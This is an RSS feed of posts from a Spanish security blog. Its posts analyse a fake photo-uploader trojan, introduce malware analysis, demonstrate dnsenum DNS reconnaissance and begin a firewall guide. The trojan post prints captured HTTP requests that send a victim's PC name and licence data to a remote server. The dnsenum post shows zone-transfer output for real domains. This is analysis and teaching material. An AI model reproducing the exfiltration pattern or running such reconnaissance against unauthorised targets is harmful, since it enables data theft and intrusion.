<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>Caminando entre bits... &#187; Seguridad</title>
	<atom:link href="http://seifreed.com/category/seguridad/feed/" rel="self" type="application/rss+xml" />
	<link>http://seifreed.com</link>
	<description></description>
	<lastBuildDate>Tue, 14 Feb 2012 07:04:20 +0000</lastBuildDate>
	<language>es</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='seifreed.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title>Caminando entre bits... &#187; Seguridad</title>
		<link>http://seifreed.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://seifreed.com/osd.xml" title="Caminando entre bits..." />
	<atom:link rel='hub' href='http://seifreed.com/?pushpress=hub'/>
		<item>
		<title>¿Que se esconde detrás del Uploader de fotos?</title>
		<link>http://seifreed.com/2012/02/13/que-se-esconde-detras-del-uploader-de-fotos/</link>
		<comments>http://seifreed.com/2012/02/13/que-se-esconde-detras-del-uploader-de-fotos/#comments</comments>
		<pubDate>Mon, 13 Feb 2012 07:00:00 +0000</pubDate>
		<dc:creator>Marc Rivero López</dc:creator>
				<category><![CDATA[Malware]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[ecrime]]></category>
		<category><![CDATA[malware]]></category>

		<guid isPermaLink="false">http://seifreed.com/?p=4068</guid>
		<description><![CDATA[Hola! Muy buenas a todos/as! Por ser el informático de la familia te encuentras muchas veces con mucho malware que tienes que quitar, aunque si que es verdad los últimos ordenadores que me he encontrado no solo he limpiado el Malware si no, que, además me he quedado con el binario para jugar con él [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&amp;blog=1473574&amp;post=4068&amp;subd=seifreed&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Hola!</p>
<p>Muy buenas a todos/as!</p>
<p>Por ser el informático de la familia te encuentras muchas veces con mucho malware que tienes que quitar, aunque si que es verdad los últimos ordenadores que me he encontrado no solo he limpiado el Malware si no, que, además me he quedado con el binario para jugar con él <img src='http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> . Esta última vez se trata de un software que simula ser un uploader de fotos. Quería saber como funcionaba el Malware así que preparé mi máquina virtual y lo ejecuté a ver que pasaba.</p>
<p>No solo el Software no funcionaba como Uploader sino, que, además generaba cierta actividad de red.</p>
<p>Las peticiones DNS:</p>
<p><img class="aligncenter" src="http://img546.imageshack.us/img546/7477/dnsquerys.png" alt="" width="800" height="53" /></p>
<p>Esto ya me resultó raro, aunque tratandose de Malware.. es normal. Pero entonces observe estas peticiones</p>
<p>Peticiones HTTP:</p>
<p><img class="aligncenter" src="http://img828.imageshack.us/img828/9250/httpconnections.png" alt="" width="800" height="92" /></p>
<p>Al parecer se añade un usuario a una web remota. El usuario es el nombre de mi pc, y la password la licencia de Windows. Es decir, envía a una base de datos remota mi licencia de Windows. Esto no lo había visto ahora, mola.</p>
<p>Quería saber como Robtex si se trataba de un sistema autónomo y había mas hosts cometiendo fraude.</p>
<p><img class="aligncenter" src="http://img15.imageshack.us/img15/5505/robtexipmod.png" alt="" width="714" height="170" /></p>
<p>Alojando en Rusia, como no <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> !</p>
<p>En la página web existen diferentes directorios, entre ellos:</p>
<p><img class="aligncenter" src="http://img827.imageshack.us/img827/8805/picturemod.png" alt="" width="600" height="186" /></p>
<p>Este es el Software que se descarga la gente que accede por error a la URI en cuestión</p>
<p>De las conexiones capturadas con Wireshark se puede ver:</p>
<blockquote><p>GET /home?action=add&amp;username=MI%20PC&amp;password=password&amp;app=Windows&amp;pcname=PERSONAL-23AB6E&amp;sitename=Microsoft HTTP/1.1<br />
User-Agent: HardCore Software For : Public<br />
Host: ejemplo.com</p>
<p>HTTP/1.1 301 Moved Permanently<br />
Date: Sun, 12 Feb 2012 14:24:02 GMT<br />
Server: LiteSpeed<br />
Connection: Keep-Alive<br />
Keep-Alive: timeout=5, max=100<br />
Location: http://cantportforward.com/home/?action=add&amp;username=MI%20PC&amp;password=password&amp;app=Windows&amp;pcname=PERSONAL-23AB6E&amp;sitename=Microsoft<br />
Content-Type: text/html<br />
Content-Length: 413</p>
<p>&lt;html&gt;<br />
&lt;head&gt;&lt;title&gt; 301 Moved Permanently<br />
&lt;/title&gt;&lt;/head&gt;<br />
&lt;body&gt;&lt;h1&gt; 301 Moved Permanently<br />
&lt;/h1&gt;<br />
The document has been permanently moved to &lt;A HREF=&#8221;%s&#8221;&gt;here&lt;/A&gt;.&lt;hr /&gt;<br />
Powered By &lt;a href=&#8217;http://www.litespeedtech.com&#8217;&gt;LiteSpeed Web Server&lt;/a&gt;&lt;br /&gt;<br />
&lt;font face=&#8221;Verdana, Arial, Helvetica&#8221; size=-1&gt;LiteSpeed Technologies is not responsible for administration and contents of this web site!&lt;/font&gt;&lt;/body&gt;&lt;/html&gt;<br />
GET /home/?action=add&amp;username=MI%20PC&amp;password=ejemplo&amp;app=Windows&amp;pcname=PERSONAL-23AB6E&amp;sitename=Microsoft HTTP/1.1<br />
User-Agent:  Public<br />
Host: ejemplo.com<br />
Connection: Keep-Alive</p>
<p>HTTP/1.1 200 OK<br />
Date: Sun, 12 Feb 2012 14:24:02 GMT<br />
Server: LiteSpeed<br />
Connection: close<br />
Set-Cookie: PHPSESSID=a8711e0c5081845ef1838155557b3714; path=/<br />
Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0<br />
Pragma: no-cache<br />
Content-Type: text/html<br />
Content-Length: 0</p></blockquote>
<p>En otro de los directorios,a  los que puedes acceder te encuentras con esta página:</p>
<p><img class="aligncenter" src="http://img837.imageshack.us/img837/1388/panelv.png" alt="" width="800" height="231" /></p>
<p>Si se observa el código fuente, una vez loqueado puedes hacer las siguientes búsquedas:</p>
<blockquote>
<pre>&lt;form name='search' method='GET' action='index.php?action=search'&gt;
		&lt;strong&gt;Search for:&lt;/strong&gt; &lt;input type='text' name='query' size='20' value="xp"&gt; In: &lt;select name='in'&gt;</pre>
<pre>		&lt;option  value='0'&gt;Softwares&lt;/option&gt;
		&lt;option  value='1'&gt;Sitename&lt;/option&gt;
		&lt;option selected=selected value='2'&gt;Username&lt;/option&gt;
		&lt;option  value='3'&gt;Password&lt;/option&gt;
		&lt;option  value='4'&gt;PC Name&lt;/option&gt;
		&lt;option  value='5'&gt;IP Address&lt;/option&gt;</pre>
<pre>		&lt;option  value='6'&gt;Date&lt;/option&gt;
		&lt;/select&gt;
		&lt;input type='submit' value='Search' name='search'&gt;
	&lt;/form&gt;</pre>
</blockquote>
<p>Parece ser que se confirma mi sospecha de que es una base de datos donde se guardan ordenadores junto con sus licencias.</p>
<p>Para acabar, el panel será vulnerable a SQL Injection? El servidor tendrá alguna vulnerabilidad que pueda ser explotada?</p>
<p>En fin.. seguiremos trabajando en ello</p>
<br />Filed under: <a href='http://seifreed.com/category/malware-2/'>Malware</a>, <a href='http://seifreed.com/category/seguridad/'>Seguridad</a> Tagged: <a href='http://seifreed.com/tag/ecrime/'>ecrime</a>, <a href='http://seifreed.com/tag/malware/'>malware</a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/seifreed.wordpress.com/4068/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/seifreed.wordpress.com/4068/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/seifreed.wordpress.com/4068/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/seifreed.wordpress.com/4068/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/seifreed.wordpress.com/4068/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/seifreed.wordpress.com/4068/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/seifreed.wordpress.com/4068/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/seifreed.wordpress.com/4068/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/seifreed.wordpress.com/4068/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/seifreed.wordpress.com/4068/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/seifreed.wordpress.com/4068/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/seifreed.wordpress.com/4068/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/seifreed.wordpress.com/4068/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/seifreed.wordpress.com/4068/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&amp;blog=1473574&amp;post=4068&amp;subd=seifreed&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://seifreed.com/2012/02/13/que-se-esconde-detras-del-uploader-de-fotos/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<georss:point>0.000000 0.000000</georss:point>
		<geo:lat>0.000000</geo:lat>
		<geo:long>0.000000</geo:long>
		<media:content url="http://1.gravatar.com/avatar/1e239b704116f53f06c340ef742d14a0?s=96&#38;d=wavatar&#38;r=G" medium="image">
			<media:title type="html">seifreed</media:title>
		</media:content>

		<media:content url="http://img546.imageshack.us/img546/7477/dnsquerys.png" medium="image" />

		<media:content url="http://img828.imageshack.us/img828/9250/httpconnections.png" medium="image" />

		<media:content url="http://img15.imageshack.us/img15/5505/robtexipmod.png" medium="image" />

		<media:content url="http://img827.imageshack.us/img827/8805/picturemod.png" medium="image" />

		<media:content url="http://img837.imageshack.us/img837/1388/panelv.png" medium="image" />
	</item>
		<item>
		<title>Empezando con el análisis de malware</title>
		<link>http://seifreed.com/2012/02/11/empezando-con-el-analisis-de-malware/</link>
		<comments>http://seifreed.com/2012/02/11/empezando-con-el-analisis-de-malware/#comments</comments>
		<pubDate>Sat, 11 Feb 2012 08:00:56 +0000</pubDate>
		<dc:creator>Marc Rivero López</dc:creator>
				<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[análisis]]></category>
		<category><![CDATA[ecrime]]></category>
		<category><![CDATA[malware]]></category>

		<guid isPermaLink="false">http://seifreed.com/?p=4063</guid>
		<description><![CDATA[Hola! Muy buenas a todos/as! Desde que entré a trabajar en el departamento de ecrime en S21Sec sabía que me acabaría tocando analizar malware. Es algo que me tenía bastante intrigado, pues pensaba que solo se basaría en hacer Ingeniería inversa. Y eso me daba pánico, porque es algo que no he echo en mi [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&amp;blog=1473574&amp;post=4063&amp;subd=seifreed&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Hola!</p>
<p>Muy buenas a todos/as!</p>
<p>Desde que entré a trabajar en el <a href="http://www.s21sec.com/">departamento de ecrime en S21Sec</a> sabía que me acabaría tocando analizar malware. Es algo que me tenía bastante intrigado, pues pensaba que solo se basaría en hacer Ingeniería inversa. Y eso me daba pánico, porque es algo que no he echo en mi vida y ya os aseguro que viendo algún compañero de la empresa como lo realiza..da miedo&#8230; jeje.</p>
<p>Los primeros pasos que hice para analizar un  malware es hacer un análisis de comportamiento del mismo, esto se puede hacer por ejemplo desde una máquina virtual y con un Wireshark capturando el tráfico desde fuera, siempre y cuando el Malware en cuestión no tenga una protección de las que detecta que está siendo ejecutado en una máquina virtual. demás existen software que protegen el ejecutable los llamados packers que dificultan el análisis del binario mediante ingenría inversa, pero eso ya lo veremos mas adelante. En este blog ya he analizado algún que otro Malware viendo que conexiones hacía que ficheros de sistema cambiaba etc..</p>
<p>De eso se trata en parte un <a href="http://seifreed.com/2011/09/06/analisis-de-comportamiento-de-un-troyano-i/">análisis de comportamiento de Malware</a>. Yo para la gente que quiera empezar lo haría así:</p>
<ol>
<li>Tener una máquina virtual Windows en Host-Only, preferiblemente.</li>
<li>Tener instalado <a href="http://www.softpedia.com/get/System/System-Info/InstallRite.shtml">InstallRit</a>e en la máquina virtual.</li>
<li>Tener capturando la actividad de la tarjeta de red con Wireshark</li>
</ol>
<p>Estos 3 pasos básicos ya nos pueden dar una idea de que hace el malware en cuestión.</p>
<p>Si recordamos el artículo de <a href="seifreed.com/2011/10/02/analizando-morto/">analizando morto, </a>la cantidad de conexiones que hacía el troyano, vuelvo a poner la imagen que tenía en el artículo:</p>
<p><img class="aligncenter" src="http://img137.imageshack.us/img137/2339/conexiones.png" alt="" width="800" height="315" /></p>
<p>Y los cambios que hacía en sistema, por ejemplo con InstallRite</p>
<p><img class="aligncenter" src="http://img641.imageshack.us/img641/6369/installrite1.png" alt="" width="800" height="254" /></p>
<p>&nbsp;</p>
<p>Este artículo de hoy es para comentar dos cosas, la primera es que para los que quieran empezar a hacer análisis de malware no os preocupéis si no sabéis hacer ingeniería inversa, aunque os animo a que aprendáis si os vais a querer dedicar, lo segundo es que analizando como se comporta el troyano en si ya sabemos cual es su modus operandi, si el malware se actualiza, de donde etc..</p>
<p>Así que ánimos</p>
<p>Saludos</p>
<p>&nbsp;</p>
<br />Filed under: <a href='http://seifreed.com/category/seguridad/'>Seguridad</a> Tagged: <a href='http://seifreed.com/tag/analisis/'>análisis</a>, <a href='http://seifreed.com/tag/ecrime/'>ecrime</a>, <a href='http://seifreed.com/tag/malware/'>malware</a>, <a href='http://seifreed.com/tag/seguridad/'>Seguridad</a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/seifreed.wordpress.com/4063/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/seifreed.wordpress.com/4063/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/seifreed.wordpress.com/4063/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/seifreed.wordpress.com/4063/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/seifreed.wordpress.com/4063/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/seifreed.wordpress.com/4063/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/seifreed.wordpress.com/4063/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/seifreed.wordpress.com/4063/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/seifreed.wordpress.com/4063/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/seifreed.wordpress.com/4063/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/seifreed.wordpress.com/4063/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/seifreed.wordpress.com/4063/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/seifreed.wordpress.com/4063/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/seifreed.wordpress.com/4063/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&amp;blog=1473574&amp;post=4063&amp;subd=seifreed&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://seifreed.com/2012/02/11/empezando-con-el-analisis-de-malware/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<georss:point>0.000000 0.000000</georss:point>
		<geo:lat>0.000000</geo:lat>
		<geo:long>0.000000</geo:long>
		<media:content url="http://1.gravatar.com/avatar/1e239b704116f53f06c340ef742d14a0?s=96&#38;d=wavatar&#38;r=G" medium="image">
			<media:title type="html">seifreed</media:title>
		</media:content>

		<media:content url="http://img137.imageshack.us/img137/2339/conexiones.png" medium="image" />

		<media:content url="http://img641.imageshack.us/img641/6369/installrite1.png" medium="image" />
	</item>
		<item>
		<title>Pentesting al DNS, dnsenum</title>
		<link>http://seifreed.com/2012/02/10/pentesting-al-dns-dnsenum/</link>
		<comments>http://seifreed.com/2012/02/10/pentesting-al-dns-dnsenum/#comments</comments>
		<pubDate>Fri, 10 Feb 2012 07:18:30 +0000</pubDate>
		<dc:creator>Marc Rivero López</dc:creator>
				<category><![CDATA[DNS]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[enumeración]]></category>
		<category><![CDATA[pentesting]]></category>

		<guid isPermaLink="false">http://seifreed.com/?p=4061</guid>
		<description><![CDATA[Hola! Muy buenas a todos/as! &#8220;La información es poder&#8221;, y que razón tenía Francis BACON al decir esta frase. Cuando realizas una auditoría, siempre tenemos el primero apartado, el apartado de Fingerprinting, en el cual se comprueba entre otras cosas que información pública contiene el target objetivo. Una de las cosas que se pueden mirar es [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&amp;blog=1473574&amp;post=4061&amp;subd=seifreed&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Hola!</p>
<p>Muy buenas a todos/as!</p>
<p>&#8220;La información es poder&#8221;, y que razón tenía <a href="http://es.wikipedia.org/wiki/Francis_Bacon">Francis BACON</a> al decir esta frase. Cuando realizas una auditoría, siempre tenemos el primero apartado, el apartado de Fingerprinting, en el cual se comprueba entre otras cosas que información pública contiene el target objetivo.</p>
<p>Una de las cosas que se pueden mirar es la versión del DNS, y es por eso que existen herramientas como dnsenum que te facilitan esta tarea.</p>
<p>dnsenum evalúa:</p>
<p>1) Get the host&#8217;s addresse (A record).</p>
<p>2) Get the namservers (threaded).</p>
<p>3) Get the MX record (threaded).</p>
<p>4) Perform axfr queries on nameservers and get BIND versions(threaded).</p>
<p>5) Get extra names and subdomains via google scraping (google query = &#8220;allinurl: -www site:domain&#8221;).</p>
<p>6) Brute force subdomains from file, can also perform recursion on subdomain that have NS records (all threaded).</p>
<p>7) Calculate C class domain network ranges and perform whois queries on them (threaded).</p>
<p>8) Perform reverse lookups on netranges ( C class or/and whois netranges) (threaded).</p>
<p>9) Write to domain_ips.txt file ip-blocks.</p>
<p>Nos sirve perfectamente para hacer las pruebas que necesitamos.</p>
<p>La herramienta la podemos descargar por SVN de aquí: <a href="http://code.google.com/p/dnsenum/source/checkout">dnsenum</a></p>
<p>Para hacerla funcionar hará falta que se instalen los siguiente módulos cpan:</p>
<p>Necesarios:<br />
Net::IP<br />
Net::DNS<br />
Net::Netmask<br />
Opcionales:<br />
Net::Whois::IP<br />
HTML::Parser<br />
WWW::Mechanize<br />
XML::Writer</p>
<p>Una vez tengamos los requisitos necesarios podemos empezar a usar la aplicación, pondré tres ejemplos.</p>
<p>Host que NO permite trasferencia de zona:</p>
<p>Para lanzar dnsenum</p>
<p>perl dnsenum.pl xubuntu.com</p>
<p>dnsenum.pl VERSION:1.2.2</p>
<blockquote><p>&#8212;&#8211; xubuntu.com &#8212;&#8211;<br />
Host&#8217;s addresses:<br />
__________________</p>
<p>xubuntu.com 600 IN A 91.189.90.40<br />
xubuntu.com 600 IN A 91.189.90.41<br />
xubuntu.com 600 IN A 91.189.89.88<br />
Name Servers:<br />
______________</p>
<p>ns1.canonical.com 147710 IN A 91.189.94.173<br />
ns2.canonical.com 147528 IN A 91.189.94.219<br />
ns3.canonical.com 126351 IN A 209.6.3.210<br />
Mail (MX) Servers:<br />
___________________</p>
<p>&nbsp;</p>
<p>Trying Zone Transfers and getting Bind Versions:<br />
_________________________________________________<br />
Trying Zone Transfer for xubuntu.com on ns1.canonical.com &#8230;<br />
AXFR record query failed: NOERROR</p>
<p>ns1.canonical.com Bind Version: 9.7.3</p>
<p>Trying Zone Transfer for xubuntu.com on ns3.canonical.com &#8230;<br />
AXFR record query failed: NOERROR</p>
<p>ns3.canonical.com Bind Version: 9.7.3</p>
<p>Trying Zone Transfer for xubuntu.com on ns2.canonical.com &#8230;<br />
AXFR record query failed: NOERROR</p>
<p>ns2.canonical.com Bind Version: 9.7.3<br />
Wildcards detected, all subdomains will point to the same IP address, bye.</p></blockquote>
<p>Podemos ver que ha conseguido extraer la información del BIND pero no permite trasferencia de Zona.</p>
<p>Hagamos otra comprobación:</p>
<p>perl dnsenum.pl gnu.org</p>
<p>dnsenum.pl VERSION:1.2.2</p>
<blockquote><p>&#8212;&#8211; gnu.org &#8212;&#8211;<br />
Host&#8217;s addresses:<br />
__________________</p>
<p>gnu.org 300 IN A 140.186.70.148<br />
Name Servers:<br />
______________</p>
<p>ns2.gnu.org 300 IN A 87.98.253.102<br />
ns1.gnu.org 300 IN A 140.186.70.164<br />
ns3.gnu.org 300 IN A 46.43.37.70<br />
Mail (MX) Servers:<br />
___________________</p>
<p>eggs.gnu.org 300 IN A 140.186.70.92<br />
Trying Zone Transfers and getting Bind Versions:<br />
_________________________________________________<br />
Trying Zone Transfer for gnu.org on ns2.gnu.org &#8230;<br />
gnu.org 300 IN SOA<br />
gnu.org 300 IN A 140.186.70.148<br />
gnu.org 300 IN TXT<br />
gnu.org 300 IN MX<br />
gnu.org 300 IN NS<br />
gnu.org 300 IN NS<br />
gnu.org 300 IN NS<br />
gnu.org 300 IN SSHFP<br />
alpha.gnu.org 300 IN A 140.186.70.21<br />
anoncvs.gnu.org 300 IN CNAME<br />
arch.gnu.org 300 IN CNAME<br />
audio-video.gnu.org 300 IN CNAME<br />
audio-video-dev.gnu.org 300 IN A 140.186.70.157<br />
audio-video-dev.gnu.org 300 IN SSHFP<br />
autoconfig.gnu.org 300 IN A 140.186.70.30<br />
be.gnu.org 300 IN NS<br />
be.gnu.org 300 IN NS<br />
ftp.be.gnu.org 300 IN CNAME<br />
www.be.gnu.org 300 IN CNAME<br />
beeblebrox.gnu.org 300 IN SSHFP<br />
bugs.gnu.org 300 IN A 140.186.70.43<br />
bzr.gnu.org 300 IN CNAME<br />
catalyst.gnu.org 300 IN SSHFP<br />
chapters.gnu.org 300 IN A 91.121.254.230<br />
front.chapters.gnu.org 300 IN A 91.121.254.230<br />
clock.gnu.org 300 IN CNAME<br />
www.cn.gnu.org 300 IN A 61.152.210.194<br />
cvs.gnu.org 300 IN CNAME<br />
dbd.gnu.org 300 IN A 140.186.70.32<br />
dbd.gnu.org 300 IN SSHFP<br />
debbugs.gnu.org 300 IN A 140.186.70.43<br />
debbugs.gnu.org 300 IN SSHFP<br />
eggs.gnu.org 300 IN A 140.186.70.92<br />
eggs.gnu.org 300 IN SSHFP<br />
elpa.gnu.org 300 IN A 140.186.70.89<br />
elpa.gnu.org 300 IN SSHFP<br />
es.gnu.org 300 IN MX<br />
es.gnu.org 300 IN A 91.121.254.230<br />
bee.es.gnu.org 300 IN CNAME<br />
www.bee.es.gnu.org 300 IN CNAME<br />
bluewall.es.gnu.org 300 IN CNAME<br />
bussiness.es.gnu.org 300 IN CNAME<br />
bw.es.gnu.org 300 IN CNAME<br />
conferencias.es.gnu.org 300 IN CNAME<br />
emacs.es.gnu.org 300 IN CNAME<br />
www.emacs.es.gnu.org 300 IN CNAME<br />
empresas.es.gnu.org 300 IN CNAME<br />
evalhackers.es.gnu.org 300 IN CNAME<br />
ftp.es.gnu.org 300 IN CNAME<br />
ghm.es.gnu.org 300 IN CNAME</p>
<p>[...]</p></blockquote>
<p>Podemos ver que el dominio de GNU.org permite trasferencia de zona en el DNS.</p>
<p>En algún DNS también nos dejan mensajes de los mas curiosos:</p>
<p>perl dnsenum aeat.es</p>
<blockquote><p>&#8212;&#8211; aeat.es &#8212;&#8211;<br />
Host&#8217;s addresses:<br />
__________________</p>
<p>aeat.es 3176 IN A 195.235.106.193<br />
Name Servers:<br />
______________</p>
<p>esifw2.tsai.es 106 IN A 213.4.194.5<br />
esifw1.tsai.es 256 IN A 213.0.43.37<br />
Mail (MX) Servers:<br />
___________________</p>
<p>correodeempresas.telefonica.es 300 IN A 212.170.236.87<br />
Trying Zone Transfers and getting Bind Versions:<br />
_________________________________________________<br />
Trying Zone Transfer for aeat.es on esifw1.tsai.es &#8230;<br />
AXFR record query failed: NOERROR</p>
<p><strong>esifw1.tsai.es Bind Version: :-b</strong></p></blockquote>
<p>Parece ser que no quieren que miremos la versión <img src='http://s2.wp.com/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> </p>
<p>Si queréis analizar un DNS de manera automática esta herramienta os puede ayudar.</p>
<p>&nbsp;</p>
<p>Saludos!</p>
<br />Filed under: <a href='http://seifreed.com/category/networking/dns/'>DNS</a>, <a href='http://seifreed.com/category/seguridad/'>Seguridad</a> Tagged: <a href='http://seifreed.com/tag/dns/'>DNS</a>, <a href='http://seifreed.com/tag/enumeracion/'>enumeración</a>, <a href='http://seifreed.com/tag/pentesting/'>pentesting</a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/seifreed.wordpress.com/4061/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/seifreed.wordpress.com/4061/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/seifreed.wordpress.com/4061/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/seifreed.wordpress.com/4061/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/seifreed.wordpress.com/4061/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/seifreed.wordpress.com/4061/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/seifreed.wordpress.com/4061/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/seifreed.wordpress.com/4061/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/seifreed.wordpress.com/4061/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/seifreed.wordpress.com/4061/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/seifreed.wordpress.com/4061/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/seifreed.wordpress.com/4061/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/seifreed.wordpress.com/4061/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/seifreed.wordpress.com/4061/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&amp;blog=1473574&amp;post=4061&amp;subd=seifreed&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://seifreed.com/2012/02/10/pentesting-al-dns-dnsenum/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<georss:point>0.000000 0.000000</georss:point>
		<geo:lat>0.000000</geo:lat>
		<geo:long>0.000000</geo:long>
		<media:content url="http://1.gravatar.com/avatar/1e239b704116f53f06c340ef742d14a0?s=96&#38;d=wavatar&#38;r=G" medium="image">
			<media:title type="html">seifreed</media:title>
		</media:content>
	</item>
		<item>
		<title>Firewall Windows 7 y Cygwin</title>
		<link>http://seifreed.com/2012/01/13/firewall-windows-7-y-cygwin/</link>
		<comments>http://seifreed.com/2012/01/13/firewall-windows-7-y-cygwin/#comments</comments>
		<pubDate>Fri, 13 Jan 2012 18:29:27 +0000</pubDate>
		<dc:creator>Marc Rivero López</dc:creator>
				<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[Console2]]></category>
		<category><![CDATA[Cygwin]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://seifreed.com/?p=4031</guid>
		<description><![CDATA[Hola! Muy buenas a todos/as! En mis andaduras de configurción del Firewall de Windows 7, me encontraba con el problema de que a veces no sabía si un paquete estaba recibiendo un DROP un allow. Los firewalls en general conocen 3 estados para la decisión con un paquete: Allow: El paquete mediante una regla preestablecida [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&amp;blog=1473574&amp;post=4031&amp;subd=seifreed&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Hola!</p>
<p>Muy buenas a todos/as!</p>
<p>En mis andaduras de configurción del Firewall de Windows 7, me encontraba con el problema de que a veces no sabía si un paquete estaba recibiendo un DROP un allow. Los firewalls en general conocen 3 estados para la decisión con un paquete:</p>
<p><strong>Allow:</strong> El paquete mediante una regla preestablecida deja pasar hacia fuera</p>
<p><strong>Drop</strong>:Se deniega el paso del paquete y no manda respuesta de ello</p>
<p><strong>Reject</strong>:Se deniega el paso de ese paquete, manda un ICMP como destino inalcanzable</p>
<p>El log de Firewall de Wndows 7 es bastante sencillo de interpretar, así que mientras hacía mis pruebas y al mas estilo Unix, con Cygwin me hice un sh para ir comprobando los paquetes. Para activar el LOG en Firewall hemos de ir a la utilidad wf.msc con permisos de administrador.</p>
<p><img class="aligncenter" src="http://img339.imageshack.us/img339/9411/firewallgeneral.png" alt="" width="601" height="467" /></p>
<p>Si obervamos la imagen tenemos que ir al menú de Propiedades de Firewall</p>
<p><img class="aligncenter" src="http://img839.imageshack.us/img839/8476/iniciogk.png" alt="" width="415" height="458" /></p>
<p>Aqui tenemos los 3 perfiles del firewall, cada perfil se establece en un área de red que heos definido cuando nos conectamos a una red. En el caso de dominio normalmente  si trabajas en dominio en una empresa, privado en casa, por ejemplo y público en todo aquel sitio que no conozcas ni sea de tu confianza.</p>
